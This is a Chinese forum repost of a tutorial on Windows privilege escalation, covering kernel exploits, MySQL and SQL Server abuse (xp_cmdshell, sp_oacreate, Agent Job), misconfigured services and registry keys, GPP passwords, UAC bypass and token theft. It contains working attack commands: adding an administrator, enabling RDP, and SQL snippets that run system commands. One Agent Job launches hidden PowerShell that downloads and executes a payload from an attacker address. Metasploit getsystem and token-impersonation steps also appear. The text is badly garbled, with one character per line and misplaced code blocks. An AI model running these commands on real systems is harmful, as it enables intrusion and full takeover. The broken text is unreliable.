论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[1038] 2021-01-11_Windows提权的几种常用姿势
文档创建者:
s7ckTeam
浏览次数:
7
最后更新:
2025-01-16
渗透测试
7 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-01-11_Windows提权的几种常用姿势
W
i
n
d
o
w
s
提
权
的
几
种
常
用
姿
势
原
创
B
y
p
a
s
s
B
y
p
a
s
s
2
0
2
1
-
0
1
-
1
1
当
获
取
主
机
权
限
时
,
我
们
总
是
希
望
可
以
将
普
通
用
户
提
升
为
管
理
员
用
户
,
以
便
获
得
高
权
限
完
全
控
制
目
标
主
机
。
W
i
n
d
o
w
s
常
用
的
提
权
方
式
有
:
内
核
提
权
、
数
据
库
提
权
、
系
统
配
置
错
误
提
权
、
组
策
略
首
选
项
提
权
、
B
y
p
a
s
s
U
A
C
提
权
、
令
牌
窃
取
提
权
等
姿
势
。
1
、
内
核
溢
出
漏
洞
提
权
、
内
核
溢
出
漏
洞
提
权
由
于
目
标
系
统
没
有
及
时
安
装
补
丁
,
攻
击
者
可
以
利
用
W
i
n
d
o
w
s
系
统
内
核
溢
出
漏
洞
进
行
提
权
,
轻
易
获
取
s
y
s
t
e
m
权
限
。
(
1
)
通
过
s
y
s
t
e
m
i
n
f
o
比
对
K
B
编
号
,
发
现
系
统
是
否
存
在
漏
洞
。
g
i
t
h
u
b
项
目
地
址
:
(
2
)
找
到
对
应
漏
洞
的
e
x
p
执
行
,
获
取
s
y
s
t
e
m
权
限
g
i
t
h
u
b
项
目
地
址
:
(
3
)
添
加
管
理
员
(
4
)
开
启
远
程
桌
面
2
、
数
据
库
提
权
、
数
据
库
提
权
2
.
1
M
y
S
Q
L
提
权
提
权
利
用
m
y
s
q
l
的
几
种
提
权
方
式
,
如
u
d
f
提
权
、
m
o
f
提
权
、
启
动
项
提
权
等
。
2
.
2
S
Q
L
S
e
r
v
e
r
提
权
提
权
利
用
S
Q
L
S
e
r
c
e
r
执
行
系
统
命
令
的
方
式
也
有
多
种
,
比
如
x
p
_
c
m
d
s
h
e
l
l
、
S
P
_
O
A
C
R
E
A
T
E
、
沙
盒
、
A
g
e
n
t
J
o
b
、
C
L
R
来
提
权
。
1
、
使
用
x
p
_
c
m
d
s
h
e
l
l
进
行
提
权
2
、
S
P
_
O
A
C
R
E
A
T
E
3
、
通
过
沙
盒
执
行
命
令
4
、
通
过
A
g
e
n
t
J
o
b
执
行
命
令
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
A
o
n
C
y
b
e
r
L
a
b
s
/
W
i
n
d
o
w
s
-
E
x
p
l
o
i
t
-
S
u
g
g
e
s
t
e
r
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
S
e
c
W
i
k
i
/
w
i
n
d
o
w
s
-
k
e
r
n
e
l
-
e
x
p
l
o
i
t
s
n
e
t
u
s
e
r
用
户
名
密
码
/
a
d
d
n
e
t
l
o
c
a
l
g
r
o
u
p
A
d
m
i
n
i
s
t
r
a
t
o
r
s
用
户
名
/
a
d
d
#
开
启
远
程
R
E
G
A
D
D
H
K
L
M
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
"
"
S
e
r
v
e
r
/
v
f
D
e
n
y
T
S
C
o
n
n
e
c
t
i
o
n
s
/
t
R
E
G
_
D
W
O
R
D
/
d
0
/
f
#
查
询
远
程
端
口
R
E
G
q
u
e
r
y
H
K
L
M
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
C
o
n
t
r
o
l
T
e
r
m
i
n
a
l
"
"
S
e
r
v
e
r
W
i
n
S
t
a
t
i
o
n
s
R
D
P
-
T
c
p
/
v
P
o
r
t
N
u
m
b
e
r
u
d
f
提
权
:
通
过
创
建
用
户
自
定
义
函
数
,
对
m
y
s
q
l
功
能
进
行
扩
充
,
可
以
执
行
系
统
任
意
命
令
,
将
m
y
s
q
l
账
号
r
o
o
t
转
化
为
系
统
s
y
s
t
e
m
权
限
。
m
o
f
提
权
:
在
w
i
n
d
o
w
s
平
台
下
,
c
:
/
w
i
n
d
o
w
s
/
s
y
s
t
e
m
3
2
/
w
b
e
m
/
m
o
f
/
n
u
l
l
e
v
t
.
m
o
f
这
个
文
件
会
每
间
隔
一
段
时
间
(
很
短
暂
)
就
会
以
s
y
s
t
e
m
权
限
执
行
一
次
,
所
以
,
只
要
我
们
将
我
们
先
要
做
的
事
通
过
代
码
存
储
到
这
个
m
o
f
文
件
中
,
就
可
以
实
现
权
限
提
升
。
启
动
项
提
权
:
将
后
面
脚
本
上
传
到
系
统
启
动
目
录
,
当
服
务
器
重
启
就
会
自
动
执
行
该
脚
本
,
从
而
获
取
系
统
权
限
。
#
启
用
x
p
_
c
m
d
s
h
e
l
l
E
X
E
C
m
a
s
t
e
r
.
.
s
p
_
c
o
n
f
i
g
u
r
e
'
s
h
o
w
a
d
v
a
n
c
e
d
o
p
t
i
o
n
s
'
,
1
;
R
E
C
O
N
F
I
G
U
R
E
;
E
X
E
C
m
a
s
t
e
r
.
.
s
p
_
c
o
n
f
i
g
u
r
e
'
x
p
_
c
m
d
s
h
e
l
l
'
,
1
;
R
E
C
O
N
F
I
G
U
R
E
;
#
通
过
x
p
_
c
m
d
s
h
e
l
l
执
行
系
统
命
令
E
x
e
c
m
a
s
t
e
r
.
d
b
o
.
x
p
_
c
m
d
s
h
e
l
l
'
w
h
o
a
m
i
'
#
开
启
组
件
E
X
E
C
s
p
_
c
o
n
f
i
g
u
r
e
'
s
h
o
w
a
d
v
a
n
c
e
d
o
p
t
i
o
n
s
'
,
1
;
R
E
C
O
N
F
I
G
U
R
E
W
I
T
H
O
V
E
R
R
I
D
E
;
E
X
E
C
s
p
_
c
o
n
f
i
g
u
r
e
'
O
l
e
A
u
t
o
m
a
t
i
o
n
P
r
o
c
e
d
u
r
e
s
'
,
1
;
R
E
C
O
N
F
I
G
U
R
E
W
I
T
H
O
V
E
R
R
I
D
E
;
E
X
E
C
s
p
_
c
o
n
f
i
g
u
r
e
'
s
h
o
w
a
d
v
a
n
c
e
d
o
p
t
i
o
n
s
'
,
0
;
#
执
行
系
统
命
令
(
无
回
显
)
d
e
c
l
a
r
e
@
s
h
e
l
l
i
n
t
e
x
e
c
s
p
_
o
a
c
r
e
a
t
e
'
w
s
c
r
i
p
t
.
s
h
e
l
l
'
,
@
s
h
e
l
l
o
u
t
p
u
t
e
x
e
c
s
p
_
o
a
m
e
t
h
o
d
@
s
h
e
l
l
,
'
r
u
n
'
,
n
u
l
l
,
'
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
c
m
d
.
e
x
e
/
c
w
h
o
a
m
i
'
#
开
启
沙
盒
e
x
e
c
m
a
s
t
e
r
.
.
x
p
_
r
e
g
w
r
i
t
e
'
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
'
,
'
S
O
F
T
W
A
R
E
M
i
c
r
o
s
o
f
t
J
e
t
4
.
0
E
n
g
i
n
e
s
'
,
'
S
a
n
d
B
o
x
M
o
d
e
'
,
'
R
E
G
_
D
W
O
R
D
'
,
1
#
利
用
j
e
t
.
o
l
e
d
b
执
行
命
令
s
e
l
e
c
t
*
f
r
o
m
o
p
e
n
r
o
w
s
e
t
(
'
m
i
c
r
o
s
o
f
t
.
j
e
t
.
o
l
e
d
b
.
4
.
0
'
,
'
;
d
a
t
a
b
a
s
e
=
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
i
a
s
d
n
a
r
y
.
m
d
b
'
,
'
s
e
l
e
c
t
s
h
e
l
l
(
"
w
h
o
a
m
i
"
)
'
)
修
改
开
启
A
g
e
e
n
t
J
o
b
,
执
行
无
回
显
C
o
b
a
l
t
S
t
r
i
k
e
生
成
p
o
w
e
r
s
h
e
l
l
上
线
3
、
系
统
配
置
错
误
提
权
、
系
统
配
置
错
误
提
权
3
.
1
权
限
配
置
错
误
权
限
配
置
错
误
如
果
管
理
员
权
限
配
置
错
误
,
将
导
致
低
权
限
用
户
对
高
权
限
运
行
的
文
件
拥
有
写
入
权
限
,
那
么
低
权
限
用
户
就
可
以
替
换
成
恶
意
后
门
文
件
,
获
取
系
统
权
限
。
一
般
在
启
动
项
、
计
划
任
务
,
服
务
里
查
找
错
误
配
置
,
尝
试
提
权
。
3
.
2
可
信
任
服
务
路
径
漏
洞
可
信
任
服
务
路
径
漏
洞
当
一
个
服
务
的
可
执
行
文
件
路
径
含
有
空
格
,
却
没
有
使
用
双
引
号
引
起
来
,
那
么
这
个
服
务
就
存
在
漏
洞
。
根
据
优
先
级
,
系
统
会
对
文
件
路
径
中
空
格
的
所
有
可
能
进
行
尝
试
,
直
到
找
到
一
个
匹
配
的
程
序
。
3
.
3
不
安
全
的
注
册
表
权
限
配
置
不
安
全
的
注
册
表
权
限
配
置
如
果
低
权
限
用
户
对
程
序
路
径
所
对
应
的
键
值
有
写
权
限
,
那
么
就
可
以
控
制
这
个
服
务
,
运
行
后
门
程
序
,
从
而
获
取
权
限
。
注
册
表
键
A
l
w
a
y
s
I
n
s
t
a
l
l
E
l
e
v
a
t
e
d
是
一
个
策
略
设
置
项
。
w
i
n
d
o
w
s
允
许
低
权
限
用
户
以
S
y
s
t
e
m
权
限
运
行
安
装
文
件
。
如
果
启
用
此
策
略
设
置
项
,
那
么
任
何
权
限
用
户
都
能
以
N
T
A
U
T
H
O
R
I
T
Y
S
Y
S
T
E
M
权
限
来
安
装
恶
意
的
M
S
I
(
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
)
文
件
。
4
、
组
策
略
首
选
项
提
权
、
组
策
略
首
选
项
提
权
S
Y
S
V
O
L
是
域
内
的
共
享
文
件
夹
,
用
来
存
放
登
录
脚
本
、
组
策
略
脚
本
等
信
息
。
当
域
管
理
员
通
过
组
策
略
修
改
密
码
时
,
在
脚
本
中
引
入
用
户
密
码
,
就
可
能
导
致
安
全
问
题
。
(
1
)
访
问
S
Y
S
V
O
L
共
享
文
件
夹
,
搜
索
包
含
“
c
p
a
s
s
w
o
r
d
”
的
X
M
L
文
件
,
获
取
A
E
S
加
密
的
密
码
。
(
2
)
使
用
k
a
l
i
自
带
的
g
p
p
-
d
e
c
r
y
p
t
进
行
破
解
5
、
、
B
y
p
a
s
s
U
A
C
提
权
提
权
U
A
C
(
U
s
e
r
A
c
c
o
u
n
t
C
o
n
t
r
o
l
,
用
户
账
号
控
制
)
,
是
微
软
引
入
的
一
种
安
全
机
制
。
B
y
p
a
s
s
U
A
C
提
权
,
可
以
将
管
理
员
权
限
提
升
到
s
y
s
t
e
m
权
限
。
使
用
m
s
f
模
块
:
U
S
E
m
s
d
b
;
E
X
E
C
d
b
o
.
s
p
_
a
d
d
_
j
o
b
@
j
o
b
_
n
a
m
e
=
N
'
t
e
s
t
_
p
o
w
e
r
s
h
e
l
l
_
j
o
b
1
'
;
E
X
E
C
s
p
_
a
d
d
_
j
o
b
s
t
e
p
@
j
o
b
_
n
a
m
e
=
N
'
t
e
s
t
_
p
o
w
e
r
s
h
e
l
l
_
j
o
b
1
'
,
@
s
t
e
p
_
n
a
m
e
=
N
'
t
e
s
t
_
p
o
w
e
r
s
h
e
l
l
_
n
a
m
e
1
'
,
@
s
u
b
s
y
s
t
e
m
=
N
'
P
o
w
e
r
S
h
e
l
l
'
,
@
c
o
m
m
a
n
d
=
N
'
p
o
w
e
r
s
h
e
l
l
.
e
x
e
-
n
o
p
-
w
h
i
d
d
e
n
-
c
"
I
E
X
(
(
n
e
w
-
o
b
j
e
c
t
n
e
t
.
w
e
b
c
l
i
e
n
t
)
.
d
o
w
n
l
o
a
d
s
t
r
i
n
g
(
'
'
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
1
4
.
1
2
9
:
8
0
/
a
'
'
)
)
"
'
,
@
r
e
t
r
y
_
a
t
t
e
m
p
t
s
=
1
,
@
r
e
t
r
y
_
i
n
t
e
r
v
a
l
=
5
;
E
X
E
C
d
b
o
.
s
p
_
a
d
d
_
j
o
b
s
e
r
v
e
r
@
j
o
b
_
n
a
m
e
=
N
'
t
e
s
t
_
p
o
w
e
r
s
h
e
l
l
_
j
o
b
1
'
;
E
X
E
C
d
b
o
.
s
p
_
s
t
a
r
t
_
j
o
b
N
'
t
e
s
t
_
p
o
w
e
r
s
h
e
l
l
_
j
o
b
1
'
;
#
存
储
W
i
n
d
o
w
s
服
务
有
关
的
信
息
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
Y
S
T
E
M
C
u
r
r
e
n
t
C
o
n
t
r
o
l
S
e
t
S
e
r
v
i
c
e
s
#
服
务
对
应
的
程
序
路
径
存
储
H
K
E
Y
_
L
O
C
A
L
_
M
A
C
H
I
N
E
S
Y
S
T
E
M
C
o
n
t
r
o
l
S
e
t
0
0
1
S
e
r
v
i
c
e
s
V
u
l
n
e
r
a
b
l
e
S
e
r
v
i
c
e
服
务
名
I
m
a
g
e
P
a
t
h
3
.
4
A
l
w
a
y
s
I
n
s
t
a
l
l
E
l
e
v
a
t
e
d
m
s
f
5
e
x
p
l
o
i
t
(
m
u
l
t
i
/
h
a
n
d
l
e
r
)
>
u
s
e
e
x
p
l
o
i
t
/
w
i
n
d
o
w
s
/
l
o
c
a
l
/
b
y
p
a
s
s
u
a
c
m
e
t
e
r
p
r
e
t
e
r
>
g
e
t
u
i
d
m
e
t
e
r
p
r
e
t
e
r
>
g
e
t
s
y
s
t
e
m
6
、
令
牌
窃
取
提
权
、
令
牌
窃
取
提
权
通
过
窃
取
令
牌
获
取
管
理
员
权
限
,
在
M
S
F
中
,
可
以
使
用
i
n
c
o
g
n
i
t
o
实
现
t
o
k
e
n
窃
取
。
m
e
t
e
r
p
r
e
t
e
r
>
u
s
e
i
n
c
o
g
n
i
t
o
#
进
入
i
n
c
o
g
n
i
t
o
模
块
m
e
t
e
r
p
r
e
t
e
r
>
l
i
s
t
_
t
o
k
e
n
s
-
u
#
列
出
令
牌
m
e
t
e
r
p
r
e
t
e
r
>
i
m
p
e
r
s
o
n
a
t
e
_
t
o
k
e
n
"
N
T
A
U
T
H
O
R
I
T
Y
S
Y
S
T
E
M
"
#
模
拟
令
牌
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试